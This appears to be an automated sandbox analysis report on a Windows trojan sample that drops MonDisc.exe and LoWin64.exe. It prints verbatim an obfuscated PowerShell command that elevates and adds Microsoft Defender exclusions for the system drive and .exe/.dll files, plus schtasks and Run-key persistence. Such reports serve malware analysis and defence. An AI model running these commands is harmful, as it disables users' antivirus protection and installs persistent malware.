Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uhyyubuhpbatllasmvhe#> powershell <#uhyyubuhpbatllasmvhe#> -Verb <#uhyyubuhpbatllasmvhe#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:00 /f /tn "MonDisc" /tr "C:\Users\user\AppData\Roaming\MonDisc.exe"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Roaming\MonDisc.exe C:\Users\user\AppData\Roaming\MonDisc.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeProcess created: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\MonDisc.exe "C:\Users\user\AppData\Roaming\MonDisc.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\MonDisc.exe "C:\Users\user\AppData\Roaming\MonDisc.exe"
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#kdqbcogdyphj#> powershell <#kdqbcogdyphj#> -Verb <#kdqbcogdyphj#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:00 /f /tn "MonDisc" /tr "C:\Users\user\AppData\Roaming\MonDisc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uvbdteguxxcvxgbwugr#> powershell <#eusqdgkfiwwiaydnu#> -Verb <#jdnlkeczqufwm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeProcess created: C:\Users\user\AppData\Roaming\MonDisc.exe C:\Users\user\AppData\Roaming\MonDisc.exeJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeProcess created: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uhyyubuhpbatllasmvhe#> powershell <#uhyyubuhpbatllasmvhe#> -Verb <#uhyyubuhpbatllasmvhe#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:00 /f /tn "MonDisc" /tr "C:\Users\user\AppData\Roaming\MonDisc.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#kdqbcogdyphj#> powershell <#kdqbcogdyphj#> -Verb <#kdqbcogdyphj#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:00 /f /tn "MonDisc" /tr "C:\Users\user\AppData\Roaming\MonDisc.exe"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeFile created: C:\Users\user\AppData\Local\Temp\MonDiscexe542.tmpJump to behavior
Source: classification engineClassification label: mal80.troj.evad.winEXE@31/21@4/6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_01
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeMutant created: \Sessions\1\BaseNamedObjects\Monkey542
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3592:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_01
Source: C:\Users\user\AppData\Roaming\MonDisc.exeMutant created: \Sessions\1\BaseNamedObjects\{VXLANG-90edbdfab2e24f1df04e7e57ff349972}
Source: C:\Users\user\AppData\Roaming\MonDisc.exeMutant created: \Sessions\1\BaseNamedObjects\Cat94
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_01
Source: C:\Users\user\AppData\Roaming\MonDisc.exeMutant created: \Sessions\1\BaseNamedObjects\{VXLANG-8ce3bdfaaeec4f1dec407e57e33a9972}
Source: C:\Users\user\AppData\Roaming\MonDisc.exeMutant created: \Sessions\1\BaseNamedObjects\{VXLANG-a0e7bdfa82e84f1dc0447e57cf3e9972}
Source: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exeMutant created: \Sessions\1\BaseNamedObjects\{VXLANG-44e6bdfa66e94f1d24457e572b3f9972}
Source: C:\Users\user\AppData\Roaming\MonDisc.exeMutant created: \Sessions\1\BaseNamedObjects\{VXLANG-b0e2bdfa92ed4f1dd0417e57df3b9972}
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2100:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3044:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3932:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1296:120:WilError_01
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: More than 176 > 100 exports found
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic file information: File size 1382400 > 1048576
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uvbdteguxxcvxgbwugr#> powershell <#eusqdgkfiwwiaydnu#> -Verb <#jdnlkeczqufwm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uhyyubuhpbatllasmvhe#> powershell <#uhyyubuhpbatllasmvhe#> -Verb <#uhyyubuhpbatllasmvhe#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#kdqbcogdyphj#> powershell <#kdqbcogdyphj#> -Verb <#kdqbcogdyphj#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uvbdteguxxcvxgbwugr#> powershell <#eusqdgkfiwwiaydnu#> -Verb <#jdnlkeczqufwm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uhyyubuhpbatllasmvhe#> powershell <#uhyyubuhpbatllasmvhe#> -Verb <#uhyyubuhpbatllasmvhe#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#kdqbcogdyphj#> powershell <#kdqbcogdyphj#> -Verb <#kdqbcogdyphj#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFBAC413DC3 pushad ; retf 12_2_00007FFBAC413DF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFBAC414C0C push cs; iretd 12_2_00007FFBAC414C0F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C9EE030 push rdx; retf 15_2_00007FF62C9EE032
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C9EE028 push rdx; retf 15_2_00007FF62C9EE032
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F499C push rbp; ret 15_2_00007FF62C8F49D8
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8FB17C pushfq ; ret 15_2_00007FF62C8FB17D
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C9EE410 push rax; ret 15_2_00007FF62C9EE411
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E3224EF pushad ; iretd 15_2_0000025E7E322514
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E319D89 push ecx; ret 15_2_0000025E7E319DD1
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F2D6F push ebp; retn 0001h15_2_0000025E7E2F2E03
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E319DBF push ecx; ret 15_2_0000025E7E319DD1
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F65D4 push ss; ret 15_2_0000025E7E2F65D5
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F3600 push ebp; ret 15_2_0000025E7E2F3605
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F85FE push eax; ret 15_2_0000025E7E2F8601
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F85F5 push eax; ret 15_2_0000025E7E2F8601
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F0B9C push es; retf 15_2_0000025E7E2F0B9D
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F5BEC push edx; retf 15_2_0000025E7E2F5BF1
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F03E9 pushfd ; ret 15_2_0000025E7E2F03EA
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F6BFD push ebp; ret 15_2_0000025E7E2F6C0D
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E322447 pushad ; iretd 15_2_0000025E7E322514
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2FE42A push ds; ret 15_2_0000025E7E2FE449
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F88C8 push esi; iretd 15_2_0000025E7E2F88CC
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F4743 push es; ret 15_2_0000025E7E2F4748
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F672E push ebx; iretd 15_2_0000025E7E2F6730
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E32B7D8 push ss; retf E8C4h15_2_0000025E7E32B888
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F3FFD pushad ; ret 15_2_0000025E7E2F3FFF
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F47F8 push es; retf 15_2_0000025E7E2F47FD
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F885C push esi; iretd 15_2_0000025E7E2F88CC
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_0000025E7E2F5836 push es; ret 15_2_0000025E7E2F5837
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_3_00007FF605B8B7C6 pushad ; iretd 22_3_00007FF605B8B7C7
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C9EE030 push rdx; retf 22_2_00007FF62C9EE032
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: section name: _RDATA
Source: LoWin64.exe.0.drStatic PE information: section name: .vxlang
Source: LoWin64.exe.0.drStatic PE information: section name: .mir
Source: MonDisc.exe.0.drStatic PE information: section name: .vxlang
Source: MonDisc.exe.0.drStatic PE information: section name: .mir
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeFile created: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeFile created: C:\Users\user\AppData\Roaming\MonDisc.exeJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:00 /f /tn "MonDisc" /tr "C:\Users\user\AppData\Roaming\MonDisc.exe"
Source: C:\Users\user\AppData\Roaming\MonDisc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MonDiscJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MonDiscJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F8EB4 GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,GetForegroundWindow,GetDoubleClickTime,GetUserDefaultLangID,GetLargePageMinimum,GetModuleHandleW,IsZoomed,GetWindowTextLengthW,GetDesktopWindow,GetTopWindow,GetCommandLineW,GetTopWindow,GetMessageTime,GetSystemDefaultLangID,AnyPopup,GetCurrentProcessId,GetUserDefaultLangID,GetSystemDefaultLangID,GetTopWindow,GetSystemDefaultLangID,GetMessageTime,GetMessageExtraInfo,IsZoomed,GetForegroundWindow,GetDoubleClickTime,GetUserDefaultLangID,GetLargePageMinimum,GetShellWindow,GetCurrentProcessId,GetCommandLineW,GetModuleHandleW,GetCommandLineW,GetCommandLineW,GetCurrentProcessId,GetLargePageMinimum,GetMessageExtraInfo,GetWindowTextLengthW,15_2_00007FF62C8F8EB4
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5101 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetLastActivePopup,IsIconic,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetLastActivePopup,GetDoubleClickTime,IsIconic,15_2_00007FF62C8F5101
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5101 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetLastActivePopup,IsIconic,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetLastActivePopup,GetDoubleClickTime,IsIconic,15_2_00007FF62C8F5101
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5101 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetLastActivePopup,IsIconic,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetLastActivePopup,GetDoubleClickTime,IsIconic,15_2_00007FF62C8F5101
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5101 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetLastActivePopup,IsIconic,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetLastActivePopup,GetDoubleClickTime,IsIconic,15_2_00007FF62C8F5101
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5101 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetLastActivePopup,IsIconic,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetLastActivePopup,GetDoubleClickTime,IsIconic,15_2_00007FF62C8F5101
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F56BC GetModuleHandleW,GetMessageExtraInfo,AnyPopup,GetWindowTextLengthW,IsZoomed,AnyPopup,GetShellWindow,GetTickCount,GetLastActivePopup,GetTickCount,GetCommandLineW,GetForegroundWindow,GetTopWindow,GetCommandLineW,GetTopWindow,GetForegroundWindow,GetMessageExtraInfo,IsZoomed,GetShellWindow,GetMessageExtraInfo,GetCurrentProcess,GetModuleHandleW,GetTickCount,AnyPopup,IsIconic,GetWindowTextLengthW,GetTopWindow,GetCurrentProcessId,GetTopWindow,GetShellWindow,GetCommandLineW,15_2_00007FF62C8F56BC
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F81BD GetCurrentProcess,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,GetLastActivePopup,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F81BD
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F63BA GetDesktopWindow,GetDoubleClickTime,GetSystemDefaultLangID,GetDoubleClickTime,GetDoubleClickTime,GetDoubleClickTime,GetDesktopWindow,GetWindowTextLengthW,GetDoubleClickTime,GetWindowTextLengthW,GetCommandLineW,GetForegroundWindow,GetTopWindow,GetLargePageMinimum,GetForegroundWindow,GetForegroundWindow,GetTickCount,GetWindowTextLengthW,IsIconic,GetCommandLineW,GetDoubleClickTime,GetUserDefaultLangID,GetDesktopWindow,GetParent,15_2_00007FF62C8F63BA
